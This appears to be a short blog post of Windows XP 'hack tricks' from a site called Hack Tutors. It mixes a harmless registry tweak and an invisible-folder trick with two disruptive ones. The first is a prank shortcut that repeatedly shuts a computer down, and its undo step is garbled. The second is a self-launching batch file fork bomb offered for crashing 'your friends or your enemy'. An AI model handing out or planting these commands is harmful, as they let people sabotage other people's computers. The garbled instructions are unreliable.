Window Xp Hack Trick

Window Xp Hack Trick

1. If you want to increase the speed of your start menu than do the following thing: Go to start menu - run - and type regedit - registry editor will get displayed than - click on HKEY_CURRENT_USER - a large list will get displayed - go to control panel - again a large list will get displayed - click on desktop only once - other side of it will display u large number of list - than try to search file name MenuShowDelay - click on it -value data will be 400 make it 0 -close all the programmes and restart your comp.

2. If u want to create duplicate virus than do the following thing:
Go to desktop - right click anywhere - go to new - shortcut -u will get a small box - there type in the following thing where they tell you to specify location just write the following thing -shutdown -s -t 200 -c "this is a virus" - click next - it will make your computer shut down after every 3.20 minutes you can increase it by replacing 200 and write it in seconds - And if you want to disable this virus than do the following thing :
Go to run - and type -
-a this will make your computer normal

3. If you want to crash down the system of your friends or your enemy than do the following thing:
WARNING once saved dont open!!
type the following in notepad and save...
the main code is:
start virus.bat
save it as (any name u want).bat

4. You want to create an invisible folder than do the following:
Invisible folder...
right click on background - new folder - rename it to (hold alt 0160) - done
name is invisible but not folder, so to make the folder invisible right click and click properties -click on customize - click on change icon - u will get an invisible icon - click and done dnt try to loose it...


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Hack Tutors — Blogger Tricks, Blogging and Social Media Tips: Window Xp Hack Trick
Window Xp Hack Trick
Hack Tutors — Blogger Tricks, Blogging and Social Media Tips
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